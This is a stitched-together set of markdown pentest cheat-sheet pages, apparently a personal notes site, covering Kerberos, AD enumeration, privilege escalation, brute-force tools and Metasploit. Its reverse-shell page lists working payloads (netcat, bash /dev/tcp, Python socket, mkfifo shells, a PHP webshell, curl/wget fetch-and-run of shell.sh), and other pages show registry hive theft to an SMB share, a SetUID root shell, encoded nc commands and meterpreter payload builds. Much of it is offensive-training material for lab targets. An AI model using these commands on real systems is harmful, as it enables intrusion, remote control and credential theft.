16 | - **Ticket Granting Service (TGS)** - The Ticket Granting Service takes the TGT and returns a ticket to a machine on the domain.
17 | - **Service Principal Name (SPN)** - A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.
18 | - **KDC Long Term Secret Key (KDC LT Key)** - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.
19 | - **Client Long Term Secret Key (Client LT Key)** - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.
20 | - **Service Long Term Secret Key (Service LT Key)** - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.
21 | - **Session Key** - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.
22 | - **Privilege Attribute Certificate (PAC)** - The PAC holds all of the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.
23 | 
24 | ## Service Ticket
25 | A service ticket contains :
26 | 
27 | - **Service Portion :** User Details, Session Key, Encrypts the ticket with the service account NTLM hash.
28 | - **User Portion :** Validity Timestamp, Session Key, Encrypts with the TGT session key.
29 | 
30 | 
31 | ## Kerberos authentication
32 | 
33 | ![Kerberos authentication](https://i.imgur.com/VRr2B6w.png)
34 | 
35 | 1. **AS-REQ** - The client requests an Authentication Ticket or Ticket Granting Ticket (TGT).
36 | 2. **AS-REP** - The Key Distribution Center verifies the client and sends back an encrypted TGT.
37 | 3. **TGS-REQ** - The client sends the encrypted TGT to the Ticket Granting Server (TGS) with the Service Principal Name (SPN) of the service the client wants to access.
38 | 4. **TGS-REP** - The Key Distribution Center (KDC) verifies the TGT of the user and that the user has access to the service, then sends a valid session key for the service to the client.
39 | 5. **AP-REQ** - The client requests the service and sends the valid session key to prove the user has access.
40 | 6. **AP-REP** - The service grants access
41 | 
42 | ### AS-REQ - Pre-Authentication
43 | 
44 | The AS-REQ step in Kerberos authentication starts when a user requests a TGT from the KDC. In order to validate the user and create a TGT for the user, the KDC must follow these exact steps. The first step is for the user to encrypt a timestamp NT hash and send it to the AS. The KDC attempts to decrypt the timestamp using the NT hash from the user, if successful the KDC will issue a TGT as well as a session key for the user.
45 | 
46 | ## References
47 | 
48 | - [THM - Attacking Kerberos](https://tryhackme.com/room/attackingkerberos)


--------------------------------------------------------------------------------
/docs/pentest/active-directory/03-enumeration.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: AD Enumeration
 3 | description: Introduction to Active directory enumeration.
 4 | ---
 5 | 
 6 | # Active Directory - Enumeration
 7 | 
 8 | ## Information gathering
 9 | 
10 | Information gathering on services like `RDP` can tell you relatively good information about an Active Diretory host or domain.
11 | 
12 | - Target : `THM-AD`
13 | - Domain : `spookysec.local`
14 | - DNS Enty : `AttacktiveDirectory.spookysec.local`
15 | 
16 | ```bash
17 | $ nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389 -sV -sC -oN scan.vuln.nmap 10.10.169.152
18 | [...]
19 | 3389/tcp open  ms-wbt-server Microsoft Terminal Services
20 | | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
21 | | Not valid before: 2022-02-13T17:33:50
22 | |_Not valid after:  2022-08-15T17:33:50
23 | | rdp-ntlm-info:
24 | |   Target_Name: THM-AD
25 | |   NetBIOS_Domain_Name: THM-AD
26 | |   NetBIOS_Computer_Name: ATTACKTIVEDIREC
27 | |   DNS_Domain_Name: spookysec.local
28 | |   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
29 | |   Product_Version: 10.0.17763
30 | |_  System_Time: 2022-02-14T18:27:20+00:00
31 | |_ssl-date: 2022-02-14T18:27:30+00:00; -1s from scanner time.
32 | Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
33 | [...]
34 | ```
35 | 
36 | ## User enumeration
37 | 
38 | ```bash
39 | $ kerbrute userenum --dc 10.10.169.152 -d spookysec.local userlist.txt
40 | [...]
41 | 2022/02/14 19:37:15 >  Using KDC(s):
42 | 2022/02/14 19:37:15 >   10.10.169.152:88
43 | 
44 | 2022/02/14 19:37:16 >  [+] VALID USERNAME:       james@spookysec.local
45 | 2022/02/14 19:37:17 >  [+] VALID USERNAME:       svc-admin@spookysec.local
46 | 2022/02/14 19:37:19 >  [+] VALID USERNAME:       James@spookysec.local
47 | 2022/02/14 19:37:20 >  [+] VALID USERNAME:       robin@spookysec.local
48 | 2022/02/14 19:37:28 >  [+] VALID USERNAME:       darkstar@spookysec.local
49 | 2022/02/14 19:37:33 >  [+] VALID USERNAME:       administrator@spookysec.local
50 | [...]
51 | ```
52 | 
53 | ## BloodHound
54 | 
55 | **BloodHound** allows you to make a graph of an Active Directory domain and quickly find misconfiguration vulnerabilities in it.
56 | 
57 | - Graphic viewer : [BloodHound](https://github.com/BloodHoundAD/BloodHound)
58 | - Collector : [SharpHound](https://github.com/BloodHoundAD/SharpHound)
59 | - Graph database : [neo4j](https://neo4j.com/download/)
60 | 
61 | ### Get started
62 | 
63 | 1. Download SharpHound on the victim host.
64 | 2. Using powershell version :
65 | 	1. Load SharpHound : `.\SharpHound.ps1`
66 | 	2. Start SharpHound collection : `Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip`
67 | 3. Using exectuable version :
68 | 	1. Start SharpHound collection : `.\SharpHound.exe -d CONTROLLER.local --zipfilename loot.zip`
69 | 4. Download the archive result on your attacker machine : `copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip`
70 | 5. Run neo4j server : `sudo docker run --rm -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=neo4j/toto -v /tmp/neo4j/data:/data neo4j`
71 | 6. Run BloodHound : Download release and execute `./BloodHound-linux-x64/BloodHound` 
72 | 	- Host : `bolt://localhost:7687`
73 | 	- Username : `neo4j`
74 | 	- Password : `toto`
75 | 7. Drag and drop `loot.zip` into `Bloodhound`.
76 | 
77 | You can run pre-defined queries by clicking on `<menu burger icon>`, then `Analysis` and finally on the queries you want to execute.
78 | 
79 | ## References
80 | 
81 | - [THM - Post-Exploitation Basics](https://tryhackme.com/room/postexploit)


--------------------------------------------------------------------------------
/docs/pentest/networks/servers.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Server listeners
 3 | description: Setup simple servers (HTTP, SMTP, ...)
 4 | ---
 5 | 
 6 | # Server listeners
 7 | 
 8 | ## SMTP Server
 9 | 
10 | Setup a SMTP server with Python.
11 | 
12 | ```bash
13 | $ sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25
14 | ---------- MESSAGE FOLLOWS ----------
15 | b'Date: Sun, 26 Sep 2021 18:21:06 +0200'
16 | b'To: user@example.com'
17 | b'From: me@example.com'
18 | b'Subject: test Sun, 26 Sep 2021 18:21:06 +0200'
19 | b'Message-Id: <20210926182106.026180@arch.localdomain>'
20 | b'X-Mailer: swaks vDEVRELEASE jetmore.org/john/code/swaks/'
21 | b'X-Peer: 127.0.0.1'
22 | b''
23 | b'This is a test mailing'
24 | b''
25 | ------------ END MESSAGE ------------
26 | ```
27 | 
28 | Command to send the mail :
29 | 
30 | ```bash
31 | $ swaks --to user@example.com --from me@example.com --server localhost
32 | ```
33 | 
34 | ## HTTP Server
35 | 
36 | Setup a HTTP server with Python.
37 | 
38 | ```bash
39 | $ python3 -m http.server --bind 0.0.0.0 4444
40 | Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
41 | 127.0.0.1 - - [26/Sep/2021 18:24:47] code 404, message File not found
42 | 127.0.0.1 - - [26/Sep/2021 18:24:47] "GET /hello HTTP/1.1" 404 -
43 | ```
44 | 
45 | Command to the the HTTP request :
46 | 
47 | ```bash
48 | $ curl localhost:4444/hello
49 | ```
50 | 
51 | ## SMB Sever
52 | 
53 | Server (on 10.9.52.138) :
54 | 
55 | ```bash
56 | $ sudo smbserver.py tmpshare .
57 | Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
58 | [...]
59 | $ sudo smbserver.py -smb2support tmpshare .
60 | [...]
61 | ```
62 | 
63 | Client :
64 | 
65 | ```bash
66 | # Download from SMB server.
67 | C:\ > copy \\10.9.52.138\tmpshare\reverse.exe .
68 | 
69 | # Send to SMB server.
70 | C:\ > reg.exe save HKLM\SAM sam.bak
71 | C:\ > copy sam.bak \\10.9.52.138\tmpshare\sam
72 | # or
73 | C:\ > reg.exe save HKLM\SYSTEM \\10.9.52.138\tmpshare\system
74 | $ secretsdump.py -sam sam -system system LOCAL
75 | [...]
76 | ```
77 | 
78 | ## SMB Server (password protected)
79 | 
80 | Run the server :
81 | 
82 | ```
83 | sudo smbserver.py tmpshare . -smb2support -username toto -password toto
84 | Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
85 | 
86 | [...]
87 | ```
88 | 
89 | Use the server :
90 | 
91 | ```
92 | PS C:\users\public> net use '\\10.10.15.176\tmpshare' /user:toto toto
93 | The command completed successfully.
94 | 
95 | PS C:\users\public> copy '\\10.10.15.176\tmpshare\winpeas.exe' .
96 | ```


--------------------------------------------------------------------------------
/docs/pentest/networks/tricks.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Networks tricks
 3 | description: Capture, firewall rules, ...
 4 | ---
 5 | 
 6 | # Networks tricks
 7 | 
 8 | ## Ping
 9 | 
10 | Use `tcpdump` to listen for ping request and reply.
11 | 
12 | ```bash
13 | $ sudo tcpdump icmp -n
14 | tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
15 | listening on wlp3s0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
16 | 18:53:25.737055 IP 192.168.117.150 > 192.168.117.58: ICMP echo request, id 1, seq 1, length 64
17 | 18:53:25.737224 IP 192.168.117.58 > 192.168.117.150: ICMP echo reply, id 1, seq 1, length 64
18 | ```
19 | 
20 | ## TCP connections
21 | 
22 | Add `iptables` rule that listen for new TCP connections.
23 | 
24 | ```bash
25 | $ sudo iptables -A INPUT -p tcp -m state --state NEW -j LOG --log-prefix "New TCP connection: " -i wlp3s0
26 | ```
27 | 
28 | !!! info
29 |     To remove the rule from `iptables`, execute the same commands but replace the `-A` with `-D`.
30 | 
31 | View the log :
32 | 
33 | ```bash
34 | $ journalctl -k --grep='New TCP connection: '
35 | Sep 26 19:04:24 arch kernel: [NEW TCP connection] IN=wlp3s0 OUT= MAC=XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX SRC=192.168.117.150 DST=192.168.117.58 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=25957
36 | ...
37 | ```
38 | 
39 | ## OS Information gathering
40 | For Linux machines the `ttl` is often close to `64`, however for Windows machines the `ttl` is close to `128`.
41 | 
42 | ```bash
43 | $ ping localhost
44 | PING localhost(localhost (::1)) 56 data bytes
45 | 64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.058 ms
46 | 64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.131 ms
47 | 64 bytes from localhost (::1): icmp_seq=3 ttl=64 time=0.078 ms
48 | ^C
49 | --- localhost ping statistics ---
50 | 3 packets transmitted, 3 received, 0% packet loss, time 2019ms
51 | rtt min/avg/max/mdev = 0.058/0.089/0.131/0.030 ms
52 | ```


--------------------------------------------------------------------------------
/docs/pentest/privesc/linux.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Linux Privesc
 3 | description: Linux privilege escalation.
 4 | ---
 5 | 
 6 | # Linux Privesc
 7 | 
 8 | ## Tools
 9 | 
10 | - [linPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
11 | - [LinEnum](https://github.com/rebootuser/LinEnum)
12 | - [LES (Linux Exploit Suggester)](https://github.com/mzet-/linux-exploit-suggester)
13 | - [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
14 | - [Linux Priv Checker](https://github.com/linted/linuxprivchecker)
15 | 
16 | ## Capabilities
17 | 
18 | ```bash
19 | getcap -r / 2>/dev/null
20 | ```
21 | 
22 | ## SetUID
23 | 
24 | ```bash
25 | echo 'int main(){setresuid(0,0,0);system("/bin/sh");}' > tmp.c
26 | gcc tmp.c -o tmp
27 | 
28 | cp /bin/bash /tmp/bash && chmod u+s /tmp/bash
29 | /tmp/bash -p
30 | ```


--------------------------------------------------------------------------------
/docs/pentest/revshell.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Reverse shell
 3 | description: Reverse and interactive shell cheatsheet.
 4 | ---
 5 | 
 6 | # Reverse shell
 7 | 
 8 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
 9 | 
10 | ## Well-known reverse shells
11 | 
12 | ```bash
13 | # Listener
14 | nc -lnvp 1234
15 | 
16 | # netcat
17 | nc -e /bin/bash 10.0.0.1 1234
18 | 
19 | # bash
20 | bash -i >& /dev/tcp/10.0.0.1/1234 0>&1
21 | 
22 | # python
23 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
24 | 
25 | # netcat (openbsd)
26 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
27 | 
28 | # php webshell
29 | <?php echo "<pre>" . system($_REQUEST["cmd"]) . "</pre>"; ?>
30 | ```
31 | 
32 | ```bash
33 | $ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.0.0.1/1234 0>&1' > shell.sh
34 | $ python3 -m http.server 8000
35 | 
36 | ?cmd=curl+10.9.52.138:8000/shell.sh+-o+/tmp/shell.sh
37 | or
38 | ?cmd=wget+10.9.52.138:8000/shell.sh+-O+/tmp/shell.sh
39 | 
40 | $ nc -lvnp 1234
41 | 
42 | ?cmd=bash+/tmp/shell.sh
43 | ```
44 | 
45 | ## Interative shell (upgrade your shell)
46 | 
47 | ```bash
48 | python -c 'import pty;pty.spawn("/bin/bash")'
49 | python3 -c 'import pty;pty.spawn("/bin/bash")'
50 | 
51 | export TERM=xterm
52 | 
53 | CTRL+Z
54 | stty raw -echo; fg
55 | ```
56 | 
57 | ```bash
58 | # Particularly useful with Windows shells (to use up/down arrows)
59 | rlwrap nc -lvnp <port>
60 | ```
61 | 
62 | ```bash
63 | # On our computer
64 | $ stty -a
65 | speed 38400 baud; rows 17; columns 240; line = 0;
66 | [...]
67 | 
68 | # On the reverse shell
69 | stty rows 17
70 | stty cols 240
71 | ```


--------------------------------------------------------------------------------
/docs/pentest/tips.md:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | # Tips
  4 | 
  5 | ## Static binaries
  6 | 
  7 | Tools like `socat`, `nmap`, ... are rarely installed on machines, however you can upload a static binary and use it.
  8 | 
  9 | **List :** ag/the_silver_searcher, binutils, file, ht, nano, nmap, p0fv3, pv(PipeViewer), python, socat, strace, tcpdump, yasm.
 10 | 
 11 | **Link :** [github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/tree/master/binaries)
 12 | 
 13 | ## Windows UTF16 Little Endian
 14 | 
 15 | ```bash
 16 | $ echo -n 'c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell' | iconv -t utf-16le | base64 -w 0
 17 | YwA6AFwAdwBpAG4AZAB...
 18 | 
 19 | C:> powershell -e YwA6AFwAdwBpAG4AZAB...
 20 | ```
 21 | 
 22 | ```powershell
 23 | $command = 'c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell'
 24 | $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
 25 | $encodedCommand = [Convert]::ToBase64String($bytes)
 26 | $encodedCommand
 27 | ```
 28 | 
 29 | Thanks `@xThaz`
 30 | 
 31 | ## Extract files from .git
 32 | 
 33 | Using git :
 34 | 
 35 | ```bash
 36 | $ ls -al web
 37 | total 12
 38 | drwxr-xr-x  3 xanhacks xanhacks 4096 Feb  7 14:47 .
 39 | drwxr-xr-x 12 xanhacks xanhacks 4096 Feb  7 14:47 ..
 40 | drwxr-xr-x  6 xanhacks xanhacks 4096 Feb  7 14:45 .git
 41 | $ git --work-tree=$(pwd) checkout HEAD^1 # checkout to a random commit
 42 | HEAD is now at 82dfc97 Initial Commit for the back-end
 43 | $ git --work-tree=$(pwd) checkout master # come back to the last commit
 44 | Previous HEAD position was 82dfc97 Initial Commit for the back-end
 45 | Switched to branch 'master
 46 | $ ls
 47 | css  favicon.png  fonts  img  index.html  js  resources
 48 | ```
 49 | 
 50 | Using [GitTools](https://github.com/internetwache/GitTools) :
 51 | 
 52 | ```bash
 53 | $ ls -al web
 54 | total 12
 55 | drwxr-xr-x  3 xanhacks xanhacks 4096 Feb  7 14:47 .
 56 | drwxr-xr-x 12 xanhacks xanhacks 4096 Feb  7 14:47 ..
 57 | drwxr-xr-x  6 xanhacks xanhacks 4096 Feb  7 14:45 .git
 58 | $ git clone https://github.com/internetwache/GitTools
 59 | [...]
 60 | $ bash GitTools/Extractor/extractor.sh web/ output/
 61 | [...]
 62 | [*] Destination folder does not exist
 63 | [*] Creating...
 64 | [+] Found commit: 70dde80cc19ec76704567996738894828f4ee895
 65 | [...]
 66 | $ ls output
 67 | 0-70dde80cc19ec76704567996738894828f4ee895
 68 | 1-345ac8b236064b431fa43f53d91c98c4834ef8f3
 69 | 2-82dfc97bec0d7582d485d9031c09abcb5c6b18f2
 70 | $ ls output/0-70dde80cc19ec76704567996738894828f4ee895
 71 | commit-meta.txt  css  favicon.png  fonts  img  index.html  js
 72 | ```
 73 | 
 74 | ## Add firewall rule
 75 | 
 76 | ### RedHat / CentOS
 77 | 
 78 | ```bash
 79 | $ firewall-cmd --zone=public --add-port PORT/tcp
 80 | $ firewall-cmd --zone=public --add-port 4444/tcp
 81 | ```
 82 | 
 83 | ### Windows
 84 | 
 85 | ```powershell
 86 | C:\> netsh advfirewall firewall add rule name="portfwd" dir=in action=allow protocol=tcp localport=20000
 87 | Ok.
 88 | ```
 89 | 
 90 | ## Bruteforce whatever you want
 91 | 
 92 | ```php
 93 | $ cat index.php
 94 | <?php
 95 | 
 96 | $pass = $_REQUEST['pass'];
 97 | system("memccat --username toto --password $pass --servers 10.10.10.190");
 98 | 
 99 | ?>
100 | $ php -S localhost:8000
101 | [Thu Feb 10 18:29:12 2022] PHP 8.1.2 Development Server (http://localhost:8000) started
102 | 
103 | $ ffuf -u 'http://localhost:8000?pass=FUZZ' -w /opt/rockyou.txt -fs 40
104 | ```


--------------------------------------------------------------------------------
/docs/pentest/tools/fcrackzip.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: fcrackzip
 3 | description: How to use fcrackzip to bruteforce ZIP files.
 4 | ---
 5 | 
 6 | # fcrackzip
 7 | 
 8 | ```bash
 9 | fcrackzip -D -p /opt/rockyou.txt -u 8702.zip
10 | ```


--------------------------------------------------------------------------------
/docs/pentest/tools/hydra.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Hydra
 3 | description: How to use hydra to bruteforce HTTP form, rdp, ...
 4 | ---
 5 | 
 6 | # Hydra
 7 | 
 8 | ## HTTP Forms
 9 | 
10 | Debug with `Burpsuite` :
11 | 
12 | ```bash
13 | $ HYDRA_PROXY_HTTP=http://127.0.0.1:8080 hydra ...
14 | ```
15 | 
16 | ### POST form
17 | 
18 | ```bash
19 | $ hydra -l admin -P /opt/rockyou.txt '10.10.103.103' http-post-form \
20 | 	-m '/login:username=^USER^&password=^PASS^&submit=Log+in:Login failed'
21 | ```
22 | 
23 | ## RDP
24 | 
25 | ```bash
26 | $ hydra -t 1 -v -f -l 'administrator' -P /opt/rockyou.txt rdp://10.10.103.103
27 | ```
28 | 
29 | ## FTP
30 | 
31 | ```bash
32 | $ hydra -L users.lst -P passwords.lst 'ftp://10.10.110.187'
33 | [...]
34 | [DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
35 | [DATA] attacking ftp://10.10.110.187:21/
36 | [21][ftp] host: 10.10.110.187   login: paradox   password: ShibesAreGreat123
37 | 1 of 1 target successfully completed, 1 valid password found
38 | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-13 19:47:34
39 | ```


--------------------------------------------------------------------------------
/docs/pentest/tools/johntheripper.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: John The Ripper
 3 | description: How to use JTR
 4 | ---
 5 | 
 6 | # John The Ripper
 7 | 
 8 | ## Custom sha512 format (salt)
 9 | 
10 | ```bash
11 | # format : hash$salt
12 | $ cat sha512_salt.hash
13 | 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed$1c362db832f3f864c8c2fe05f2002a05
14 | 
15 | $ john sha512_salt.hash --wordlist=/opt/rockyou.txt --format='dynamic=sha512($p.$s)'
16 | [...]
17 | Using default input encoding: UTF-8
18 | Loaded 1 password hash (dynamic=sha512($p.$s) [128/128 AVX 2x])
19 | Warning: no OpenMP support for this hash type, consider --fork=8
20 | Press 'q' or Ctrl-C to abort, almost any other key for status
21 | november16       (?)
22 | 1g 0:00:00:00 DONE (2021-12-13 13:53) 50.00g/s 924000p/s 924000c/s 924000C/s yasmeen..nolan
23 | Use the "--show --format=dynamic=sha512($p.$s)" options to display all of the cracked passwords reliably
24 | Session completed
25 | ```
26 | 
27 | ## Using rules
28 | 
29 | ```
30 | $ john --wordlist=words.lst --rules=KoreLogic --stdout > words_KoreLogic.lst
31 | ```
32 | 
33 | ## Add custom rules
34 | 
35 | Path :
36 | 
37 | - /etc/john/john.conf
38 | - /opt/john/john.conf
39 | - /usr/share/john/john.conf
40 | 
41 | Rules :
42 | 
43 | - `Az` : Word from original wordlist
44 | - `"[0-9]"` : One digit
45 | - `[!@#$]` : Special chars
46 | - `^`, `$` : Beginning / end of word.
47 | 
48 | ```
49 | [List.Rules:THM-Password-Attacks]
50 | Az"[0-9][0-9]" ^[!@]
51 | ```
52 | 
53 | ## Crack ZIP
54 | 
55 | ```bash
56 | $ zip2john 8702.zip > zip.hash
57 | $ john zip.hash --wordlist=/opt/rockyou.txt
58 | ```


--------------------------------------------------------------------------------
/docs/pentest/tools/metasploit.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Metasploit
  3 | description: Metasploit guide.
  4 | ---
  5 | 
  6 | # Metasploit
  7 | 
  8 | ## Msfvenom
  9 | 
 10 | List payload : `msfvenom --list payload`
 11 | 
 12 | ```bash
 13 | # Windows (EXE)
 14 | $ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
 15 | 
 16 | # Windows (x86 EXE with encoder)
 17 | $ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
 18 | 
 19 | # Linux (ELF)
 20 | $ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f elf -o shell.bin
 21 | ```
 22 | 
 23 | - `staged` : 2 parts, a listener, then the reverse shell is send to the listener.
 24 | - `stageless` : Reverse shell is directly inside the payload.
 25 | 
 26 | ## Ressource file
 27 | 
 28 | File `listener.rc` :
 29 | 
 30 | ```
 31 | use exploit/multi/handler
 32 | set LHOST tun0
 33 | set LPORT 9001
 34 | set payload windows/x64/meterpreter_reverse_tcp
 35 | exploit -j
 36 | ```
 37 | 
 38 | Command : `msfconsole -r listener.rc`
 39 | 
 40 | ---
 41 | 
 42 | Use `ruby` inside ressource file.
 43 | 
 44 | ```
 45 | msf6 > resource shell2meterpreter.rc
 46 | [*] Processing /tmp/shell2meterpreter.rc for ERB directives.
 47 | [*] resource (/tmp/shell2meterpreter.rc)> Ruby Code (165 bytes)
 48 | ```
 49 | 
 50 | File `shell2meterpreter.rc` :
 51 | 
 52 | ```ruby
 53 | <ruby>
 54 | framework.sessions.each_pair do |sid, session|
 55 |   run_single("use post/multi/manage/shell_to_meterpreter")
 56 |   run_single("set SESSION #{sid}")
 57 |   run_single("run")
 58 | end
 59 | </ruby>
 60 | ```
 61 | 
 62 | ## Favorites
 63 | 
 64 | Add module to favorites :
 65 | 
 66 | ```
 67 | msf6 exploit(multi/handler) > favorite
 68 | [+] Added exploit/multi/handler to the favorite modules file
 69 | ```
 70 | 
 71 | Show favorites :
 72 | 
 73 | ```
 74 | msf6 > show favorites
 75 | 
 76 | Favorites
 77 | =========
 78 | 
 79 |    #  Name                                      Disclosure Date  Rank     Check  Description
 80 |    -  ----                                      ---------------  ----     -----  -----------
 81 |    0  exploit/multi/handler                                      manual   No     Generic Payload Handler
 82 |    1  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 83 | ```
 84 | 
 85 | Delete a favorite :
 86 | 
 87 | ```
 88 | msf6 > favorite -d exploit/multi/handler
 89 | [*] Removing exploit/multi/handler from the favorite modules file
 90 | ```
 91 | 
 92 | ## Modules
 93 | 
 94 | ### shell_to_meterpreter
 95 | 
 96 | ```
 97 | msf6 > use post/multi/manage/shell_to_meterpreter
 98 | msf6 post(multi/manage/shell_to_meterpreter) > set session 1
 99 | session => 1
100 | msf6 post(multi/manage/shell_to_meterpreter) > set LPORT 4445
101 | LPORT => 4445
102 | msf6 post(multi/manage/shell_to_meterpreter) > run
103 | ```


--------------------------------------------------------------------------------
/docs/pentest/tools/nmap.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Nmap
 3 | description: How to use nmap
 4 | ---
 5 | 
 6 | # Nmap
 7 | 
 8 | ## NSE - Nmap Script Engine
 9 | 
10 | Written in lua and available in `/usr/share/nmap/scripts`.
11 | 
12 | -   `safe` : Won't affect the target.
13 | -   `intrusive` : Not safe: likely to affect the target.
14 | -   `vuln` : Scan for vulnerabilities.
15 | -   `exploit` : Attempt to exploit a vulnerability.
16 | -   `auth` : Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously).
17 | -   `brute` : Attempt to bruteforce credentials for running services.
18 | -   `discovery` : Attempt to query running services for further information about the network (e.g. query an SNMP server).
19 | 
20 | Display help :
21 | 
22 | - `nmap --script-help <script-name>`
23 | 
24 | Using script arguments :
25 | 
26 | - `nmap -p 80 --script http-put --script-args http-put.url='/dav/shell.php',http-put.file='./shell.php'`
27 | 
28 | Find a NSE :
29 | 
30 | ```bash
31 | $ cd /usr/share/nmap/scripts
32 | $ grep smb script.db
33 | Entry { filename = "smb-brute.nse", categories = { "brute", "intrusive", } }
34 | Entry { filename = "smb-double-pulsar-backdoor.nse", categories = { "malware", "safe", "vuln", } }
35 | Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } }
36 | Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } }
37 | Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } }
38 | Entry { filename = "smb-enum-services.nse", categories = { "discovery", "intrusive", "safe", } }
39 | [...]
40 | ```
41 | 
42 | ## Ping sweep (IMCP scan)
43 | 
44 | ```bash
45 | nmap -sn 192.168.0.0/24
46 | ```


--------------------------------------------------------------------------------
/docs/pentest/tools/wpscan.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: WPScan
3 | description: How to use wpscan.
4 | ---
5 | 
6 | ```bash
7 | wpscan -o wpscan.out -e --url http://blog.thm/
8 | wpscan -U users.lst -P /opt/rockyou.txt --password-attack xmlrpc --url http://blog.htb/
9 | ```


--------------------------------------------------------------------------------
/docs/pentest/wifi/01-introduction.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to Wi-Fi
 3 | description: Introduction to Wi-Fi
 4 | ---
 5 | 
 6 | # Wi-Fi Security
 7 | 
 8 | WiFi security algorithms have been through many changes and upgrades since the 1990s to become more secure and effective.
 9 | 
10 | Wireless security protocols goals :
11 | 
12 | - Prevent unwanted parties from connecting to your wireless network.
13 | - Encrypt your private data sent over the airwaves.
14 | 
15 | Wireless / Wired networks :
16 | 
17 | - Wired networks transmit data by a network cable (more secure).
18 | - Wireless networks broadcast it within their range in every direction to every connected device that happens to be listening.
19 | 
20 | ## WEP - Wired Equivalent Privacy
21 | 
22 | WEP standard was approved in 1999 and officially abandoned in 2004.
23 | 
24 | WEP uses a RC4 stream encryption algorithm (64, 128, 256 bits key), CRC-32 for checksum and OSA/SKA for authentication.
25 | 
26 | The RC4 algorithm is no longer considered safe to use.
27 | 
28 | ## WPA - Wi-Fi Protected Access
29 | 
30 | WPA was formally adopted in 2003.
31 | 
32 | **WPA Personal :**
33 | 
34 | - use a Pre-Shared Key (PSK) for authentication
35 | - use a Temporal Key Integrity Protocol (TKIP) for encryption
36 | 
37 | **WPA Enterprise :**
38 | 
39 | - use an authentication server for keys and certificates generation
40 | 
41 | Attacks on WPA are often linked to WPS.
42 | 
43 | ### WPS - Wireless Protected Setup
44 | 
45 | WPS was introduced in 2006.
46 | 
47 | **WPS** was developed to simplify the linking of devices to modern access points instead of using long passphrases.
48 | 
49 | **Methods** for adding a device to the network :
50 | 
51 | - **PIN** : Enter the PIN from the access point (often display on screen).
52 | - **Push button** : Push a button on both the access point and the new wireless client device.
53 | - **Near-field communication** : Bring the new client close to the access point to allow NFC.
54 | - **USB** : Use an USB to transfer data between client and access point.
55 | 
56 | ## WPA2 - Wi-Fi Protected Access v2
57 | 
58 | The most important improvement of WPA2 over WPA was the usage of the Advanced Encryption Standard (AES).
59 | 
60 | At this time the main vulnerability to a WPA2 system is when the attacker already has access to a secured WiFi network and can gain access to certain keys to perform an attack on other devices on the network.
